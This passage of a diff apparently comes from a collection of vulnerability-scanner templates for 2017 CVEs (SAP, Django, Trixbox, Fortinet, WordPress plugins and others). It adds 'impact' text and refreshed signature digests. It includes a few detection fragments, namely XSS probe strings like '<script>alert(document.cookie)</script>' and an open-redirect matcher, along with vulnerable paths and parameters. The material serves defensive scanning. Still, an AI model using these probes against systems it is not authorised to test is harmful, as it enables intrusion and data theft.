   description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access, data leakage, and potential system compromise.
   remediation: |
     Apply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bea8f103f782f283209cc58274ae864a0eb67d6f9d539175d776344091a9204c02210088e6594ed493ed4629f2e1bd1577cf6dbbe86410db2b75403918a8fa4932b010:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a8683657514f719b732f05c7f6d45ec7dfa7e1e84cfb94bc48f4f48dfb98d72b022100c7903e2a07cc85ba954eac808f177b137a97309cdafbe60db6302fde5ed5c8bf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml
index 666c0f21eb..ab73021ea5 100644
--- a/http/cves/2017/CVE-2017-12794.yaml
+++ b/http/cves/2017/CVE-2017-12794.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping  disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204bf285deaadc3fe0b915d412d086a45be71be916df777b449d2ef9880f3b966e02206b7a58203911694f3198b021356334ec4df4f3a0378f7b96fc474668a749bfc5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c3e6f228ecb88b45dede1fdb09bc0de8eb69e3910bef23a8b392cc658b900416022100f5764bd903049f446e74a2490b9686da2809edffc40fba47ccd1bacfc8051eb7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml
index f35e60d4c2..c70116e62b 100644
--- a/http/cves/2017/CVE-2017-14135.yaml
+++ b/http/cves/2017/CVE-2017-14135.yaml
@@ -5,6 +5,8 @@ info:
   author: alph4byt3
   severity: critical
   description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of OpenDreambox.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009a970d16fc5829edc967ada93be00fe47cb0b5b6fe52e071231600693b38152a022076f49389649e053f3a74d18b3de2f6d23a00c0c7b38c38b5000f4b75d91945b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220157cb388a5c368f67fd096a8be0f564c05cba5a2904f26d045b060193aef26a3022008e6bb9ac07464019fc095732ee47003a68d85f4d3fb0dcbc9b69afe4e813713:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml
index db33dd26e6..3da75fbe4d 100644
--- a/http/cves/2017/CVE-2017-14186.yaml
+++ b/http/cves/2017/CVE-2017-14186.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement.
   remediation: |
     Apply the latest security patches or firmware updates provided by Fortinet to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d375f7887413f53f6be88ca0a07b20a61c8f913e8e492c1d503bc1fa7dbb1b16022100e0ea8c4a597674bf28a80947a31d99e0fd825b61de1200ae747d1b54bfab94ff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022033e095c75c7ee5b5d4ff29049155c01dbe8b0adb0045f1f654f97d384138498302207247708359a6d804ac67feddbddc4ea3be54223fa25cc7f030bc91e32d323fa7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml
index 1d2ced86c4..7d2a1c2af1 100644
--- a/http/cves/2017/CVE-2017-14524.yaml
+++ b/http/cves/2017/CVE-2017-14524.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator.
   reference:
@@ -37,4 +39,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
-# digest: 490a0046304402207974a3aefbb9a4075af20d0b9e527322841ab79789ec1040be875069aa4c882602207a59c2f1def28dfe7db8f63cda2a8bb9b0ddfe0e44a42db27487f589b2651cac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220619f2ba461299fea2ef0aa4ee538657a6afcd1ec712499bf7ee16308cfbbcf42022055bc3bd8d4f45b3f53ff97de7cd4037a12ed3b24b776f6178d7eca86288fc6cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml
index 4bdcd3bd91..daac719fd7 100644
--- a/http/cves/2017/CVE-2017-14535.yaml
+++ b/http/cves/2017/CVE-2017-14535.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
   remediation: |
     Upgrade to a patched version of Trixbox or apply the necessary security patches provided by the vendor.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402200e1eea6041c5695c251491fd2fca30a07c170f636a8d197bcf9bd104ecbbeca3022051a4563a172168f8b9e365d307629a3809a78c4f4bbfcbaacd840281197e13ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ca2eeb51d69833fce729ea7bccda8dcd482fc9561d5790e03a4a0a866b49cb30022100d971de87dda13d5f12f2d03ad203e5ff11adcac44cf8bb5ffd3bf915bf7f3d4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml
index eccc4b07e0..168b15f886 100644
--- a/http/cves/2017/CVE-2017-14537.yaml
+++ b/http/cves/2017/CVE-2017-14537.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of Trixbox to mitigate this vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022100f44828302f807f47f81672227bf0f6e606d4cdc0083c91dfa7dc747b31e0c77f021f4042da9e9c19854e245f4c1a8824b57b4915137d5e3d1301ff05cd286ca883:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ce798eebc2e3146f836802ce53f92d76f694ba17ff0de6da85a6da34fb64153302203847448c352b718f2bbaf5fc50b231f4442e16c21728227241168cb38bce5995:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml
index b3544b4da3..f057b6a698 100644
--- a/http/cves/2017/CVE-2017-14622.yaml
+++ b/http/cves/2017/CVE-2017-14622.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
   remediation: |
     Update the WordPress 2kb Amazon Affiliates Store plugin to version 2.1.1 or later to mitigate the vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
           - 'contains(body_2, "<script>alert(document.domain)</script>")'
           - 'contains(body_2, "2kb-amazon-affiliates-store")'
         condition: and
-# digest: 4b0a00483046022100fb7c73f09f8db22ee3cf9e6096885624eda8e37fb5cdd44984e299bfdefb8128022100b0587c2d8d259fb63fbf42651f23046f8c27c8f154155f388d7925b1ede164a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fbe2638f2197d98f6d17eb8b14bba6aa3881a5802b758b859ef22d3cf902ad1802202ccb86f4fbc0b324795230c7d5844c8b3c46f39b812249c4a3820fae2582d5c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml
index 5393a47303..bbba668241 100644
--- a/http/cves/2017/CVE-2017-14651.yaml
+++ b/http/cves/2017/CVE-2017-14651.yaml
@@ -5,6 +5,8 @@ info:
   author: mass0ma
   severity: medium
   description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of WSO2 Data Analytics Server or apply the necessary security patches provided by the vendor.
   reference:
@@ -44,4 +46,4 @@ http:
         part: header
         words:
           - "text/html"
-# digest: 4b0a00483046022100ef1a1aba953c410e67689e521749bca385790a45a5ae9426253dcff2b7b2be60022100b6e4dcb3c03570487e047d25e697d365c595799a0c856ba5f39cc4cb2eadb1e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008b07f1f6dcdfb99425fda0917bc8613751fe16d663a0297826b0a3db4fe14afb022100f68ca3c53fdaa80a532ad2f794369719807edae411100178d0cf5c20baeff1ba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml
index fd308219a5..ab037ec119 100644
--- a/http/cves/2017/CVE-2017-14849.yaml
+++ b/http/cves/2017/CVE-2017-14849.yaml
@@ -5,6 +5,8 @@ info:
   author: Random_Robbie
   severity: high
   description: Node.js before 8.6.0 allows remote attackers to access unintended files because a change to ".." handling is incompatible with the pathname validation used by unspecified community modules.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade Node.js to version 8.6.0 or higher to mitigate the vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022017aaba785bb8a91d8344c38c42086c80a2fe3f243869b59b1239ac2f0bb53a3e022077e738f0b7713d0c09936f28508d59aba8e0bc3da4a7ed8da462d6111302ac77:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d32e38e5c77d87ed4bf896dd4bdb9cdeee769be08f7fe2c698966d8ea053bbd3022100c83aa53a1e9d9a971011fe65d379b05b8f17d1ea1447f85808530b7f72493086:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml
index 755c8555ed..d8bc45f000 100644
--- a/http/cves/2017/CVE-2017-15287.yaml
+++ b/http/cves/2017/CVE-2017-15287.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks.
   reference:
@@ -38,4 +40,4 @@ http:
       - type: word
         words:
           - 'Unknown command: <script>alert(document.cookie)</script>'
-# digest: 4a0a00473045022100db07aff63a597eab76e353f2ad7a35a7f5e54367c4c8da9075442dbf2f880948022018899463fc4e8ff0d5d597f9c15fe87abe28012ce9aced07ada493741ac9c407:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e93abdf24d9ebdfb400623b4a62901a6d7de1500c413707c694dafbc1281f705022100a25758a51d9bdecfb6f21cf981b25d44c7004255d0138a81424d72c178aab165:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml
index 988d423e76..c0b652cc0b 100644
--- a/http/cves/2017/CVE-2017-15363.yaml
+++ b/http/cves/2017/CVE-2017-15363.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter.
+  impact: |
+    The vulnerability allows an attacker to include local files, potentially leading to unauthorized access or code execution.
   remediation: |
     Update to the latest version of Restler and TYPO3 to fix the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b5dc466cbf54f54cf3e790af8f1f9b4e330559dcc25ebfa4c36a5e22e51dce6c0221008166bc08bfc7d1a54d9caeb1ee2d9f5cc908b2c8d3628b88dbdb7a9eb98f9c30:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220165ac278ba5a144b4ba8c0f774c904786c78a06bab7f65678eb9029af132ab8e0221009bb15f6f3a88dc6fee5e3a0a6a33ab8aecdd4131dc407ae5e2fd5b159fe9d332:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml
index 873c8722ba..6fde3c1850 100644
--- a/http/cves/2017/CVE-2017-15647.yaml
+++ b/http/cves/2017/CVE-2017-15647.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the system, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest firmware update provided by FiberHome to fix the LFI vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ded4d3e22ba62dab364dddc8b6f251198189d6597492f45fb7d43afe1170523b022100c03dfe3310774e68395881261da7c5eec7af3319a376c1912f511bdec32acd0c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b99b21136a7da51f6fde99bc313826c8e0cf6163b5eb0a1cd9f60058b9a2d9f302204c93df9c5308f861f92fd50798727bc52f8e0cfa37123bd8f35d83d8cf416c87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml
index cd55dc6486..1ee0b87025 100644
--- a/http/cves/2017/CVE-2017-15715.yaml
+++ b/http/cves/2017/CVE-2017-15715.yaml
@@ -4,8 +4,9 @@ info:
   name: Apache httpd <=2.4.29 - Arbitrary File Upload
   author: geeknik
   severity: high
-  description: |
-    Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in <FilesMatch>, which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
+  description: Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in <FilesMatch>, which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
+  impact: |
+    An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access.
   remediation: |
     Upgrade Apache httpd to a version higher than 2.4.29 or apply the necessary patches.
   reference:
@@ -55,4 +56,4 @@ http:
       - type: dsl
         dsl:
           - 'contains(body_2, "{{randstr_1}}")'
-# digest: 4a0a00473045022100abd46adad44dafdef4d05a83d1eb72bb10e4e5c95441f4c1ebb45ca7f9f6588a022011c915ee8ca020281ecd81145377ad19054ed527c300d6098577af5244cda526:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022069ba591c8789f32ab114d7e83ef9294186d2663f7b3b9f1dd04da6b876bb306d022051e0fb2b787b48bffe629076ac4efa050ba50bfea5225a528357511d69466d41:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml
index 682df52f2f..54a89b4589 100644
--- a/http/cves/2017/CVE-2017-15944.yaml
+++ b/http/cves/2017/CVE-2017-15944.yaml
@@ -5,6 +5,8 @@ info:
   author: emadshanab,milo2012
   severity: critical
   description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches and updates provided by Palo Alto Networks.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202d34183cb2f320d5a21d4da9fb27c11e96dabfa51a8a58d19b4a5cf31ae472fb0220245786fe60e03078a58384a4c60647ff442f3049404f3ba6413002e2d6c45055:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b0524ec37a83dc42c2b65d5aaac79624687b7227515255ee075850523e653201022100899414ace80feab0f8077de3482984940b0ffa4b302405b75e6a9f900662f65b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml
index 1b1eaf622a..c1573f9479 100644
--- a/http/cves/2017/CVE-2017-16806.yaml
+++ b/http/cves/2017/CVE-2017-16806.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: high
   description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server.
   remediation: |
     Upgrade Ulterius Server to version 1.9.5.0 or later to mitigate the directory traversal vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f570950d14d48b344076ddcc943ae578008cb25b0a360b763cad398a2a8dd047022100bb17b1cadceaf0a6d750fffc5558105607450a4f5b06ac2cf306ea93397069de:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022069b7891ad5aaca1653c140cd869d8ba35fe546084d82bd8b47bb0c8ea8e823dc02201217ec2f0810289d76d3f48a7e790a571718babd758b0888df0c94e79191bbfb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml
index 71903d7546..568b6a47e3 100644
--- a/http/cves/2017/CVE-2017-16877.yaml
+++ b/http/cves/2017/CVE-2017-16877.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
   remediation: |
     Upgrade Nextjs to version 2.4.1 or above to mitigate this vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220710dbb6922566e82da1ca35f94dd508fcbc709d10446162a9253ca1919333a57022038062489ab24d432a9451c53538a27416514188268fd5deb90ba06d48121b55a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ad6c79d8aabc67656e602bb168bd5eeceb6adc9d08c95328baf3c8332a97bd9102207ba6c60dcbd9f0be62d66d45a898c823b38a9c495abe192eb6823f6f924db40b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml
index f4586d9d81..7c8c7b0124 100644
--- a/http/cves/2017/CVE-2017-16894.yaml
+++ b/http/cves/2017/CVE-2017-16894.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the application.
   remediation: |
     Upgrade Laravel to version 5.5.21 or higher to fix the information disclosure vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ae244c7d0f0112bbc6aad8a6ef46a65c0c412b04af53f731ef0f7d434bd27e43022070083a878a7bab37c6e405f18bfd153308962bd624b393685c92297f5b978232:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100914fea1c5c5534987b0dc8ea3a544420accc258866f44f710fad4491682b0bca022100f7a5f4ca76cea0ed4bbda6d945cee0182a2917e87824945712ce1b6fb4988113:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml
index bf2774b361..bc046d444f 100644
--- a/http/cves/2017/CVE-2017-17043.yaml
+++ b/http/cves/2017/CVE-2017-17043.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Emag Marketplace Connector plugin 1.0 contains a reflected cross-site scripting vulnerability because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the theft of sensitive information, session hijacking, or the execution of arbitrary code in the context of the affected user.
   remediation: |
     Update to the latest version of the WordPress Emag Marketplace Connector plugin (1.1) or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022076ac14e629d0eb9401a2bb572264d7297ebed441080f2ca744e5bd24a98f12e702205ad3d8ff5cd8f2b7e27340523dd28da3c63f3a426ce59d3e27c8b038c63f4567:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210099b66f2b537913518129239b39f8a159700ddc127b1cacef95cc77ffc20ae2980221009c8e7999da3ad546302bf6fc02528bfb4b559370b20490ec03cb419fe9c5cb47:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml
index 7aed5027df..4adc2176e9 100644
--- a/http/cves/2017/CVE-2017-17059.yaml
+++ b/http/cves/2017/CVE-2017-17059.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser.
   remediation: |
     Update to the latest version of amtyThumb Posts plugin or apply the patch provided by the vendor.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207b2bdbb876af0e1b7cf65774abeb017cc6ad7b9e6388fc3d1c455f680828b6ca022100b2582fdf4aa8212408787b5f87f2bb5f47bc38a10ecaca0a5ffab4aa946c1076:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008c4f13602a06f46d0d4a6887df2d973aeafffb6358c3aad171a0174bf239740202207e98d73e8472701429a91d4960f68b35bfa05b042381951899224ac8de4302c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml
index 719e5aeca5..5a14e9e547 100644
--- a/http/cves/2017/CVE-2017-17451.yaml
+++ b/http/cves/2017/CVE-2017-17451.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Update to the latest version of the WordPress Mailster plugin (>=1.5.5) which includes a fix for this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022021b68ba86aae15b21273b1f23c7a7172992b7fb0d4e074b595cef18ebfde0e26022100c4cddd9d836a9c0d1f8056c8a03bb07b20702bba91f2ad7c5b532d82448c6508:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220491d259e23e6cefe49a6a7b38773ccb1de991200484fb2caaecb31bcc41a6ca002203de830f8319daa563dfd24e34fcdc23dd63c2325348f95f05d31df7e2e3527c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml
index 3a7ebe7c2a..e074c69ee0 100644
--- a/http/cves/2017/CVE-2017-17562.yaml
+++ b/http/cves/2017/CVE-2017-17562.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade to Embedthis GoAhead version 3.6.5 or later to mitigate this vulnerability.
   reference:
@@ -115,4 +117,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204b81e1248180dfbefe035f387ae59f399f04d501acf182da47c59e91f335509a022043a07e3d24e1baa868a57e24990a74a0f85e145e86dcd15c4df74a3db28cbd8b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206d8b4f8428127f8b2379baa95eadcd604f9e7f9de8a7abc8a9f4105bca7cd921022100fbeddc2319778aa6b137c92b0c89423c7b8a8cfbbe4ad1b1fdf41b229e583285:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml
index a07edf2b3a..60f4ad3759 100644
--- a/http/cves/2017/CVE-2017-17731.yaml
+++ b/http/cves/2017/CVE-2017-17731.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest security patch or upgrade to a newer version of DedeCMS to mitigate the SQL Injection vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
